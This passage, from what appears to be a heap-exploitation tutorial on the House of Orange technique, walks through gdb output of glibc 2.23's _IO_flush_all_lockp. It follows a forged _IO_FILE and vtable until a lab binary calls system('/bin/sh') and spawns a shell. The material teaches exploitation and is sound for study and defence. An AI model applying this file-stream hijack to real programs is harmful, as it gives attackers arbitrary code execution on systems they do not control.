7ffff77f7000-7ffff780d000 r-xp 00000000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff780d000-7ffff7a0c000 ---p 00016000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0c000-7ffff7a0d000 rw-p 00015000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fda000-7ffff7fdd000 rw-p 00000000 00:00 0 7ffff7ff6000-7ffff7ff7000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] gdb-peda$
- To check the behavior of _IO_flush_all_lockp (), set breakpoints as follows.
- Check the value stored in run_fp at 0x7ffff7a89106 and the value of fp->_mode at 0x7ffff7a89165.
- Check the values of fp→_IO_write_base, fp→_IO_write_ptr at 0x7ffff7a89280, and check the values of fp→_chain at 0x7ffff7a8920a.
- Check the called function at 0x7ffff7a89184.
Breakpoint - _IO_flush_all_lockp()
Breakpoint 9, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:760 760 genops.c: No such file or directory. gdb-peda$ disassemble _IO_flush_all_lockp Dump of assembler code for function _IO_flush_all_lockp: => 0x00007ffff7a89020 <+0>: push r15 0x00007ffff7a89022 <+2>: push r14 0x00007ffff7a89024 <+4>: mov r14d,edi 0x00007ffff7a89027 <+7>: push r13 0x00007ffff7a89029 <+9>: push r12 0x00007ffff7a8902b <+11>: push rbp 0x00007ffff7a8902c <+12>: push rbx 0x00007ffff7a8902d <+13>: sub rsp,0x28 0x00007ffff7a89031 <+17>: test edi,edi 0x00007ffff7a89033 <+19>: je 0x7ffff7a89260 <_IO_flush_all_lockp+576> 0x00007ffff7a89039 <+25>: mov r13d,DWORD PTR [rip+0x34d6f0] # 0x7ffff7dd6730 <__libc_pthread_functions_init> 0x00007ffff7a89040 <+32>: test r13d,r13d 0x00007ffff7a89043 <+35>: jne 0x7ffff7a892e0 <_IO_flush_all_lockp+704> 0x00007ffff7a89049 <+41>: lea rax,[rip+0xffffffffffffe8e0] # 0x7ffff7a87930 <flush_cleanup> 0x00007ffff7a89050 <+48>: mov QWORD PTR [rsp+0x8],0x0 0x00007ffff7a89059 <+57>: mov QWORD PTR [rsp],rax 0x00007ffff7a8905d <+61>: mov rdx,QWORD PTR fs:0x10 0x00007ffff7a89066 <+70>: cmp rdx,QWORD PTR [rip+0x34a6fb] # 0x7ffff7dd3768 <list_all_lock+8> 0x00007ffff7a8906d <+77>: je 0x7ffff7a890b5 <_IO_flush_all_lockp+149> 0x00007ffff7a8906f <+79>: mov esi,0x1 0x00007ffff7a89074 <+84>: xor eax,eax 0x00007ffff7a89076 <+86>: cmp DWORD PTR [rip+0x34d6c3],0x0 # 0x7ffff7dd6740 <__libc_multiple_threads> 0x00007ffff7a8907d <+93>: je 0x7ffff7a8908b <_IO_flush_all_lockp+107> 0x00007ffff7a8907f <+95>: lock cmpxchg DWORD PTR [rip+0x34a6d9],esi # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a89087 <+103>: jne 0x7ffff7a89094 <_IO_flush_all_lockp+116> 0x00007ffff7a89089 <+105>: jmp 0x7ffff7a890ae <_IO_flush_all_lockp+142> 0x00007ffff7a8908b <+107>: cmpxchg DWORD PTR [rip+0x34a6ce],esi # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a89092 <+114>: je 0x7ffff7a890ae <_IO_flush_all_lockp+142> 0x00007ffff7a89094 <+116>: lea rdi,[rip+0x34a6c5] # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a8909b <+123>: sub rsp,0x80 0x00007ffff7a890a2 <+130>: call 0x7ffff7b22080 <__lll_lock_wait_private> 0x00007ffff7a890a7 <+135>: add rsp,0x80 0x00007ffff7a890ae <+142>: mov QWORD PTR [rip+0x34a6b3],rdx # 0x7ffff7dd3768 <list_all_lock+8> 0x00007ffff7a890b5 <+149>: mov eax,DWORD PTR [rip+0x34a6a9] # 0x7ffff7dd3764 <list_all_lock+4> 0x00007ffff7a890bb <+155>: mov rbx,QWORD PTR [rip+0x34945e] # 0x7ffff7dd2520 <_IO_list_all> 0x00007ffff7a890c2 <+162>: mov r15d,DWORD PTR [rip+0x34a68f] # 0x7ffff7dd3758 <_IO_list_all_stamp> 0x00007ffff7a890c9 <+169>: add eax,0x1 0x00007ffff7a890cc <+172>: test rbx,rbx 0x00007ffff7a890cf <+175>: mov DWORD PTR [rip+0x34a68f],eax # 0x7ffff7dd3764 <list_all_lock+4> 0x00007ffff7a890d5 <+181>: je 0x7ffff7a89307 <_IO_flush_all_lockp+743> 0x00007ffff7a890db <+187>: xor ebp,ebp 0x00007ffff7a890dd <+189>: mov r12,QWORD PTR fs:0x10 0x00007ffff7a890e6 <+198>: jmp 0x7ffff7a89103 <_IO_flush_all_lockp+227> 0x00007ffff7a890e8 <+200>: nop DWORD PTR [rax+rax*1+0x0] 0x00007ffff7a890f0 <+208>: mov rbx,QWORD PTR [rip+0x349429] # 0x7ffff7dd2520 <_IO_list_all> 0x00007ffff7a890f7 <+215>: test rbx,rbx 0x00007ffff7a890fa <+218>: je 0x7ffff7a89217 <_IO_flush_all_lockp+503> 0x00007ffff7a89100 <+224>: mov r15d,eax 0x00007ffff7a89103 <+227>: test r14d,r14d 0x00007ffff7a89106 <+230>: mov QWORD PTR [rip+0x34a643],rbx # 0x7ffff7dd3750 <run_fp> 0x00007ffff7a8910d <+237>: je 0x7ffff7a89165 <_IO_flush_all_lockp+325> 0x00007ffff7a8910f <+239>: mov eax,DWORD PTR [rbx] 0x00007ffff7a89111 <+241>: and eax,0x8000 0x00007ffff7a89116 <+246>: jne 0x7ffff7a89165 <_IO_flush_all_lockp+325> 0x00007ffff7a89118 <+248>: mov rdx,QWORD PTR [rbx+0x88] 0x00007ffff7a8911f <+255>: cmp r12,QWORD PTR [rdx+0x8] 0x00007ffff7a89123 <+259>: je 0x7ffff7a89161 <_IO_flush_all_lockp+321> 0x00007ffff7a89125 <+261>: mov esi,0x1 0x00007ffff7a8912a <+266>: cmp DWORD PTR [rip+0x34d60f],0x0 # 0x7ffff7dd6740 <__libc_multiple_threads> 0x00007ffff7a89131 <+273>: je 0x7ffff7a8913b <_IO_flush_all_lockp+283> 0x00007ffff7a89133 <+275>: lock cmpxchg DWORD PTR [rdx],esi 0x00007ffff7a89137 <+279>: jne 0x7ffff7a89140 <_IO_flush_all_lockp+288> 0x00007ffff7a89139 <+281>: jmp 0x7ffff7a89156 <_IO_flush_all_lockp+310> 0x00007ffff7a8913b <+283>: cmpxchg DWORD PTR [rdx],esi 0x00007ffff7a8913e <+286>: je 0x7ffff7a89156 <_IO_flush_all_lockp+310> 0x00007ffff7a89140 <+288>: lea rdi,[rdx] 0x00007ffff7a89143 <+291>: sub rsp,0x80 0x00007ffff7a8914a <+298>: call 0x7ffff7b22080 <__lll_lock_wait_private> 0x00007ffff7a8914f <+303>: add rsp,0x80 0x00007ffff7a89156 <+310>: mov rdx,QWORD PTR [rbx+0x88] 0x00007ffff7a8915d <+317>: mov QWORD PTR [rdx+0x8],r12 0x00007ffff7a89161 <+321>: add DWORD PTR [rdx+0x4],0x1 0x00007ffff7a89165 <+325>: mov eax,DWORD PTR [rbx+0xc0] 0x00007ffff7a8916b <+331>: test eax,eax 0x00007ffff7a8916d <+333>: jle 0x7ffff7a89280 <_IO_flush_all_lockp+608> 0x00007ffff7a89173 <+339>: mov rax,QWORD PTR [rbx+0xa0] 0x00007ffff7a8917a <+346>: mov rcx,QWORD PTR [rax+0x18] 0x00007ffff7a8917e <+350>: cmp QWORD PTR [rax+0x20],rcx 0x00007ffff7a89182 <+354>: jbe 0x7ffff7a891a1 <_IO_flush_all_lockp+385> 0x00007ffff7a89184 <+356>: mov rax,QWORD PTR [rbx+0xd8] 0x00007ffff7a8918b <+363>: mov esi,0xffffffff 0x00007ffff7a89190 <+368>: mov rdi,rbx 0x00007ffff7a89193 <+371>: call QWORD PTR [rax+0x18] 0x00007ffff7a89196 <+374>: cmp eax,0xffffffff 0x00007ffff7a89199 <+377>: mov eax,0xffffffff 0x00007ffff7a8919e <+382>: cmove ebp,eax 0x00007ffff7a891a1 <+385>: test r14d,r14d 0x00007ffff7a891a4 <+388>: je 0x7ffff7a891f0 <_IO_flush_all_lockp+464> 0x00007ffff7a891a6 <+390>: test DWORD PTR [rbx],0x8000 0x00007ffff7a891ac <+396>: jne 0x7ffff7a891f0 <_IO_flush_all_lockp+464> 0x00007ffff7a891ae <+398>: mov rdx,QWORD PTR [rbx+0x88] 0x00007ffff7a891b5 <+405>: sub DWORD PTR [rdx+0x4],0x1 0x00007ffff7a891b9 <+409>: jne 0x7ffff7a891f0 <_IO_flush_all_lockp+464> 0x00007ffff7a891bb <+411>: mov QWORD PTR [rdx+0x8],0x0 0x00007ffff7a891c3 <+419>: cmp DWORD PTR [rip+0x34d576],0x0 # 0x7ffff7dd6740 <__libc_multiple_threads> 0x00007ffff7a891ca <+426>: je 0x7ffff7a891d3 <_IO_flush_all_lockp+435> 0x00007ffff7a891cc <+428>: lock dec DWORD PTR [rdx] 0x00007ffff7a891cf <+431>: jne 0x7ffff7a891d7 <_IO_flush_all_lockp+439> 0x00007ffff7a891d1 <+433>: jmp 0x7ffff7a891ed <_IO_flush_all_lockp+461> 0x00007ffff7a891d3 <+435>: dec DWORD PTR [rdx] 0x00007ffff7a891d5 <+437>: je 0x7ffff7a891ed <_IO_flush_all_lockp+461> 0x00007ffff7a891d7 <+439>: lea rdi,[rdx] 0x00007ffff7a891da <+442>: sub rsp,0x80 0x00007ffff7a891e1 <+449>: call 0x7ffff7b220b0 <__lll_unlock_wake_private> 0x00007ffff7a891e6 <+454>: add rsp,0x80 0x00007ffff7a891ed <+461>: nop DWORD PTR [rax] 0x00007ffff7a891f0 <+464>: mov eax,DWORD PTR [rip+0x34a562] # 0x7ffff7dd3758 <_IO_list_all_stamp> 0x00007ffff7a891f6 <+470>: mov QWORD PTR [rip+0x34a54f],0x0 # 0x7ffff7dd3750 <run_fp> 0x00007ffff7a89201 <+481>: cmp eax,r15d 0x00007ffff7a89204 <+484>: jne 0x7ffff7a890f0 <_IO_flush_all_lockp+208> 0x00007ffff7a8920a <+490>: mov rbx,QWORD PTR [rbx+0x68] 0x00007ffff7a8920e <+494>: test rbx,rbx 0x00007ffff7a89211 <+497>: jne 0x7ffff7a89100 <_IO_flush_all_lockp+224> 0x00007ffff7a89217 <+503>: test r14d,r14d 0x00007ffff7a8921a <+506>: je 0x7ffff7a8922f <_IO_flush_all_lockp+527> 0x00007ffff7a8921c <+508>: mov eax,DWORD PTR [rip+0x34a542] # 0x7ffff7dd3764 <list_all_lock+4> 0x00007ffff7a89222 <+514>: sub eax,0x1 0x00007ffff7a89225 <+517>: test eax,eax 0x00007ffff7a89227 <+519>: mov DWORD PTR [rip+0x34a537],eax # 0x7ffff7dd3764 <list_all_lock+4> 0x00007ffff7a8922d <+525>: je 0x7ffff7a89298 <_IO_flush_all_lockp+632> 0x00007ffff7a8922f <+527>: test r13d,r13d 0x00007ffff7a89232 <+530>: je 0x7ffff7a8924f <_IO_flush_all_lockp+559> 0x00007ffff7a89234 <+532>: mov rax,QWORD PTR [rip+0x34d4bd] # 0x7ffff7dd66f8 <__libc_pthread_functions+376> 0x00007ffff7a8923b <+539>: mov rdi,rsp 0x00007ffff7a8923e <+542>: xor esi,esi 0x00007ffff7a89240 <+544>: ror rax,0x11 0x00007ffff7a89244 <+548>: xor rax,QWORD PTR fs:0x30 0x00007ffff7a8924d <+557>: call rax 0x00007ffff7a8924f <+559>: add rsp,0x28 0x00007ffff7a89253 <+563>: mov eax,ebp 0x00007ffff7a89255 <+565>: pop rbx 0x00007ffff7a89256 <+566>: pop rbp 0x00007ffff7a89257 <+567>: pop r12 0x00007ffff7a89259 <+569>: pop r13 0x00007ffff7a8925b <+571>: pop r14 0x00007ffff7a8925d <+573>: pop r15 0x00007ffff7a8925f <+575>: ret 0x00007ffff7a89260 <+576>: mov rbx,QWORD PTR [rip+0x3492b9] # 0x7ffff7dd2520 <_IO_list_all> 0x00007ffff7a89267 <+583>: xor r13d,r13d 0x00007ffff7a8926a <+586>: mov r15d,DWORD PTR [rip+0x34a4e7] # 0x7ffff7dd3758 <_IO_list_all_stamp> 0x00007ffff7a89271 <+593>: test rbx,rbx 0x00007ffff7a89274 <+596>: jne 0x7ffff7a890db <_IO_flush_all_lockp+187> 0x00007ffff7a8927a <+602>: xor ebp,ebp 0x00007ffff7a8927c <+604>: jmp 0x7ffff7a8924f <_IO_flush_all_lockp+559> 0x00007ffff7a8927e <+606>: xchg ax,ax 0x00007ffff7a89280 <+608>: mov rax,QWORD PTR [rbx+0x20] 0x00007ffff7a89284 <+612>: cmp QWORD PTR [rbx+0x28],rax 0x00007ffff7a89288 <+616>: ja 0x7ffff7a89184 <_IO_flush_all_lockp+356> 0x00007ffff7a8928e <+622>: jmp 0x7ffff7a891a1 <_IO_flush_all_lockp+385> 0x00007ffff7a89293 <+627>: nop DWORD PTR [rax+rax*1+0x0] 0x00007ffff7a89298 <+632>: mov QWORD PTR [rip+0x34a4c5],0x0 # 0x7ffff7dd3768 <list_all_lock+8> 0x00007ffff7a892a3 <+643>: cmp DWORD PTR [rip+0x34d496],0x0 # 0x7ffff7dd6740 <__libc_multiple_threads> 0x00007ffff7a892aa <+650>: je 0x7ffff7a892b7 <_IO_flush_all_lockp+663> 0x00007ffff7a892ac <+652>: lock dec DWORD PTR [rip+0x34a4ad] # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a892b3 <+659>: jne 0x7ffff7a892bf <_IO_flush_all_lockp+671> 0x00007ffff7a892b5 <+661>: jmp 0x7ffff7a892d9 <_IO_flush_all_lockp+697> 0x00007ffff7a892b7 <+663>: dec DWORD PTR [rip+0x34a4a3] # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a892bd <+669>: je 0x7ffff7a892d9 <_IO_flush_all_lockp+697> 0x00007ffff7a892bf <+671>: lea rdi,[rip+0x34a49a] # 0x7ffff7dd3760 <list_all_lock> 0x00007ffff7a892c6 <+678>: sub rsp,0x80 0x00007ffff7a892cd <+685>: call 0x7ffff7b220b0 <__lll_unlock_wake_private> 0x00007ffff7a892d2 <+690>: add rsp,0x80 0x00007ffff7a892d9 <+697>: jmp 0x7ffff7a8922f <_IO_flush_all_lockp+527> 0x00007ffff7a892de <+702>: xchg ax,ax 0x00007ffff7a892e0 <+704>: mov rax,QWORD PTR [rip+0x34d409] # 0x7ffff7dd66f0 <__libc_pthread_functions+368> 0x00007ffff7a892e7 <+711>: mov rdi,rsp 0x00007ffff7a892ea <+714>: xor edx,edx 0x00007ffff7a892ec <+716>: ror rax,0x11 0x00007ffff7a892f0 <+720>: xor rax,QWORD PTR fs:0x30 0x00007ffff7a892f9 <+729>: lea rsi,[rip+0xffffffffffffe630] # 0x7ffff7a87930 <flush_cleanup> 0x00007ffff7a89300 <+736>: call rax 0x00007ffff7a89302 <+738>: jmp 0x7ffff7a8905d <_IO_flush_all_lockp+61> 0x00007ffff7a89307 <+743>: xor ebp,ebp 0x00007ffff7a89309 <+745>: jmp 0x7ffff7a89222 <_IO_flush_all_lockp+514> End of assembler dump. gdb-peda$ b *0x00007ffff7a89106 Breakpoint 10 at 0x7ffff7a89106: file genops.c, line 775. gdb-peda$ b *0x00007ffff7a89165 Breakpoint 11 at 0x7ffff7a89165: file genops.c, line 779. gdb-peda$ b *0x00007ffff7a89280 Breakpoint 12 at 0x7ffff7a89280: file genops.c, line 779. gdb-peda$ b *0x00007ffff7a8920a Breakpoint 13 at 0x7ffff7a8920a: file genops.c, line 800. gdb-peda$ b *0x00007ffff7a89184 Breakpoint 14 at 0x7ffff7a89184: file genops.c, line 786. gdb-peda$
_IO_flush_all_lockp () stores 0x7ffff7dd1b78 in run_fp, which is the address of main_arena.top.
run_fp = fp;
gdb-peda$ c Continuing. Breakpoint 10, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:775 775 in genops.c gdb-peda$ x/i $rip => 0x7ffff7a89106 <_IO_flush_all_lockp+230>: mov QWORD PTR [rip+0x34a643],rbx # 0x7ffff7dd3750 <run_fp> gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ p _IO_list_all $36 = (struct _IO_FILE_plus *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$
- _IO_flush_all_lockp () gets the value from the address that fp has plus 0xc0.
- The address points to fp-> _ mode, and the value stored in that variable is 0x7ffff7dd1c28.
fp->_mode <= 0
gdb-peda$ c Continuing. Breakpoint 11, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:779 779 in genops.c gdb-peda$ x/i $rip => 0x7ffff7a89165 <_IO_flush_all_lockp+325>: mov eax,DWORD PTR [rbx+0xc0] gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ x/gx 0x7ffff7dd1b78 + 0xc0 0x7ffff7dd1c38 <main_arena+280>: 0x00007ffff7dd1c28 gdb-peda$ p &(*(struct _IO_FILE *)0x7ffff7dd1b78)._mode $37 = (int *) 0x7ffff7dd1c38 <main_arena+280> gdb-peda$
The following code compares the values stored in [rbx + 0x20] and [rbx + 0x28].
[rbx (0x7ffff7dd1b78) + 0x20] points to fp → _IO_write_base and [rbx (0x7ffff7dd1b78) + 0x28] points to fp → _IO_write_ptr.
(fp-> _ mode <= 0 && fp-> _ IO_write_ptr> fp → _IO_write_base) This conditional statement fails because the value of "fp-> _ mode" is greater than 0 and does not satisfy the condition.
fp->_IO_write_ptr > fp->_IO_write_base
gdb-peda$ c Continuing. Breakpoint 17, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:779 779 in genops.c gdb-peda$ x/2i $rip => 0x7ffff7a89280 <_IO_flush_all_lockp+608>: mov rax,QWORD PTR [rbx+0x20] 0x7ffff7a89284 <_IO_flush_all_lockp+612>: cmp QWORD PTR [rbx+0x28],rax gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ p/x 0x7ffff7dd1b78 + 0x20 $55 = 0x7ffff7dd1b98 gdb-peda$ p &(*(struct _IO_FILE *)0x7ffff7dd1b78)._IO_write_base $56 = (char **) 0x7ffff7dd1b98 <main_arena+120> gdb-peda$ p/x 0x7ffff7dd1b78 + 0x28 $57 = 0x7ffff7dd1ba0 gdb-peda$ p &(*(struct _IO_FILE *)0x7ffff7dd1b78)._IO_write_ptr $58 = (char **) 0x7ffff7dd1ba0 <main_arena+128> gdb-peda$ ni
- The following code stores the value of fp→_chain in fp, and the value of fp→_chain is 0x602400.
- The address is fake _IO_list_all (_IO_FILE, _IO_jump_t).
fp = fp->_chain;
gdb-peda$ c Continuing. Breakpoint 13, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:800 800 in genops.c gdb-peda$ x/i $rip => 0x7ffff7a8920a <_IO_flush_all_lockp+490>: mov rbx,QWORD PTR [rbx+0x68] gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ x/gx 0x7ffff7dd1b78 + 0x68 0x7ffff7dd1be0 <main_arena+192>: 0x0000000000602400 gdb-peda$ p &(*(struct _IO_FILE*)0x7ffff7dd1b78)._chain $42 = (struct _IO_FILE **) 0x7ffff7dd1be0 <main_arena+192> gdb-peda$ p fp $43 = (struct _IO_FILE *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ ni 773 in genops.c gdb-peda$ p fp $44 = (struct _IO_FILE *) 0x602400 gdb-peda$
- _IO_flush_all_lockp () saves the value of fp(0x602400) in run_fp and checks the value of fp→_mode using that value.
- The value fp → _mode has is 0x0.
Run the code with the new value stored in fp.
gdb-peda$ c Continuing. Breakpoint 10, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:775 775 in genops.c gdb-peda$ x/i $rip => 0x7ffff7a89106 <_IO_flush_all_lockp+230>: mov QWORD PTR [rip+0x34a643],rbx # 0x7ffff7dd3750 <run_fp> gdb-peda$ i r rbx rbx 0x602400 0x602400 gdb-peda$ c Continuing. Breakpoint 11, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:779 779 in genops.c gdb-peda$ x/3i $rip => 0x7ffff7a89165 <_IO_flush_all_lockp+325>: mov eax,DWORD PTR [rbx+0xc0] 0x7ffff7a8916b <_IO_flush_all_lockp+331>: test eax,eax 0x7ffff7a8916d <_IO_flush_all_lockp+333>: jle 0x7ffff7a89280 <_IO_flush_all_lockp+608> gdb-peda$ i r rbx rbx 0x602400 0x602400 gdb-peda$ x/gx 0x602400 + 0xc0 0x6024c0: 0x0000000000000000 gdb-peda$ p &(*(struct _IO_FILE *)0x602400)._mode $45 = (int *) 0x6024c0 gdb-peda$ p (*(struct _IO_FILE *)0x602400)._mode $46 = 0x0 gdb-peda$ c Continuing.
- The value of fp → _IO_write_base is 0x2, and the value of fp-> _ IO_write_ptr is 0x3.
- fp->_ mode (0x0) <= 0 && fp->_ IO_write_ptr (3)> fp→_IO_write_base (2) This conditional statement will call _IO_OVERFLOW () because it satisfies all conditions.
fp->_IO_write_ptr(3) > fp→_IO_write_base(2)
gdb-peda$ c Continuing. Breakpoint 12, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:779 779 in genops.c gdb-peda$ x/4i $rip => 0x7ffff7a89280 <_IO_flush_all_lockp+608>: mov rax,QWORD PTR [rbx+0x20] 0x7ffff7a89284 <_IO_flush_all_lockp+612>: cmp QWORD PTR [rbx+0x28],rax 0x7ffff7a89288 <_IO_flush_all_lockp+616>: ja 0x7ffff7a89184 <_IO_flush_all_lockp+356> 0x7ffff7a8928e <_IO_flush_all_lockp+622>: jmp 0x7ffff7a891a1 <_IO_flush_all_lockp+385> gdb-peda$ i r rbx rbx 0x602400 0x602400 gdb-peda$ x/gx 0x602400 + 0x20 0x602420: 0x0000000000000002 gdb-peda$ x/gx 0x602400 + 0x28 0x602428: 0x0000000000000003 gdb-peda$ p &(*(struct _IO_FILE *)0x602400)._IO_write_base $47 = (char **) 0x602420 gdb-peda$ p &(*(struct _IO_FILE *)0x602400)._IO_write_ptr $48 = (char **) 0x602428 gdb-peda$ p (*(struct _IO_FILE *)0x602400)._IO_write_base $49 = 0x2 <error: Cannot access memory at address 0x2> gdb-peda$ p (*(struct _IO_FILE *)0x602400)._IO_write_ptr $50 = 0x3 <error: Cannot access memory at address 0x3> gdb-peda$ c Continuing
- _IO_flush_all_lockp () gets the address of the vtable from 0x602400 plus 0xd8, and the value stored in __overflow is the address of the winner function.
- The function passes 0x602400 as the first argument, and the address contains the string "/bin/sh".
- Then call the address of the winner function stored in __overflow using the call command.
- Because of this, winner() passes "/bin/sh" to system() to get the shell.
Call winner()
Breakpoint 15, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c:786 786 in genops.c gdb-peda$ x/4i $rip => 0x7ffff7a89184 <_IO_flush_all_lockp+356>: mov rax,QWORD PTR [rbx+0xd8] 0x7ffff7a8918b <_IO_flush_all_lockp+363>: mov esi,0xffffffff 0x7ffff7a89190 <_IO_flush_all_lockp+368>: mov rdi,rbx 0x7ffff7a89193 <_IO_flush_all_lockp+371>: call QWORD PTR [rax+0x18] gdb-peda$ i r rbx rbx 0x602400 0x602400 gdb-peda$ x/gx 0x602400 + 0xd8 0x6024d8: 0x0000000000602460 gdb-peda$ p (*(struct _IO_jump_t*)0x602460).__overflow $51 = (_IO_overflow_t) 0x40078d <winner> gdb-peda$ ni 0x00007ffff7a8918b 786 in genops.c gdb-peda$ ni 0x00007ffff7a89190 786 in genops.c gdb-peda$ ni 0x00007ffff7a89193 786 in genops.c gdb-peda$ x/i $rip => 0x7ffff7a89193 <_IO_flush_all_lockp+371>: call QWORD PTR [rax+0x18] gdb-peda$ i r rax rdi rax 0x602460 0x602460 rdi 0x602400 0x602400 gdb-peda$ x/gx 0x602460 + 0x18 0x602478: 0x000000000040078d gdb-peda$ x/3i 0x000000000040078d 0x40078d <winner>: push rbp 0x40078e <winner+1>: mov rbp,rsp 0x400791 <winner+4>: sub rsp,0x10 gdb-peda$ x/s 0x602400 0x602400: "/bin/sh" gdb-peda$ ni [New process 57773] process 57773 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x400693 Cannot insert breakpoint 2. Cannot access memory at address 0x40069f Cannot insert breakpoint 3. Cannot access memory at address 0x4006ab Cannot insert breakpoint 4. Cannot access memory at address 0x4006dc Cannot insert breakpoint 5. Cannot access memory at address 0x4006e2 Cannot insert breakpoint 6. Cannot access memory at address 0x400781 Cannot insert breakpoint 8. Cannot access memory at address 0x7ffff7a84510 Cannot insert breakpoint 9. Cannot access memory at address 0x7ffff7a89020 Cannot insert breakpoint 10. Cannot access memory at address 0x7ffff7a89106 Cannot insert breakpoint 11. Cannot access memory at address 0x7ffff7a89165 Cannot insert breakpoint 15. Cannot access memory at address 0x7ffff7a89184 Cannot insert breakpoint 13. Cannot access memory at address 0x7ffff7a8920a Cannot insert breakpoint 12. Cannot access memory at address 0x7ffff7a89280 Cannot insert breakpoint 7. Cannot access memory at address 0x7ffff7a8a750 gdb-peda$
- The following error message was displayed, but the shell was obtained.
Get shell!
lazenca0x0@ubuntu:~/Book/Heap$ ./house_of_orange p1 : 0x2216010 p2 : 0x2237010 *** Error in `./house_of_orange': malloc(): memory corruption: 0x00007fce93f2f520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fce93be17e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fce93bec13e] /lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fce93bee184] ./house_of_orange[0x400786] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fce93b8a830] ./house_of_orange[0x400589] ======= Memory map: ======== 00400000-00401000 r-xp 00000000 08:01 695734 /home/lazenca0x0/Book/Heap/house_of_orange 00600000-00601000 r--p 00000000 08:01 695734 /home/lazenca0x0/Book/Heap/house_of_orange 00601000-00602000 rw-p 00001000 08:01 695734 /home/lazenca0x0/Book/Heap/house_of_orange 02216000-02259000 rw-p 00000000 00:00 0 [heap] 7fce8c000000-7fce8c021000 rw-p 00000000 00:00 0 7fce8c021000-7fce90000000 ---p 00000000 00:00 0 7fce93954000-7fce9396a000 r-xp 00000000 08:01 920001 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fce9396a000-7fce93b69000 ---p 00016000 08:01 920001 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fce93b69000-7fce93b6a000 rw-p 00015000 08:01 920001 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fce93b6a000-7fce93d2a000 r-xp 00000000 08:01 919963 /lib/x86_64-linux-gnu/libc-2.23.so 7fce93d2a000-7fce93f2a000 ---p 001c0000 08:01 919963 /lib/x86_64-linux-gnu/libc-2.23.so 7fce93f2a000-7fce93f2e000 r--p 001c0000 08:01 919963 /lib/x86_64-linux-gnu/libc-2.23.so 7fce93f2e000-7fce93f30000 rw-p 001c4000 08:01 919963 /lib/x86_64-linux-gnu/libc-2.23.so 7fce93f30000-7fce93f34000 rw-p 00000000 00:00 0 7fce93f34000-7fce93f5a000 r-xp 00000000 08:01 919935 /lib/x86_64-linux-gnu/ld-2.23.so 7fce94140000-7fce94143000 rw-p 00000000 00:00 0 7fce94158000-7fce94159000 rw-p 00000000 00:00 0 7fce94159000-7fce9415a000 r--p 00025000 08:01 919935 /lib/x86_64-linux-gnu/ld-2.23.so 7fce9415a000-7fce9415b000 rw-p 00026000 08:01 919935 /lib/x86_64-linux-gnu/ld-2.23.so 7fce9415b000-7fce9415c000 rw-p 00000000 00:00 0 7ffc7a92f000-7ffc7a950000 rw-p 00000000 00:00 0 [stack] 7ffc7a99c000-7ffc7a99f000 r--p 00000000 00:00 0 [vvar] 7ffc7a99f000-7ffc7a9a1000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $
Related information
- http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
- https://github.com/shellphish/how2heap/blob/master/house_of_orange.c
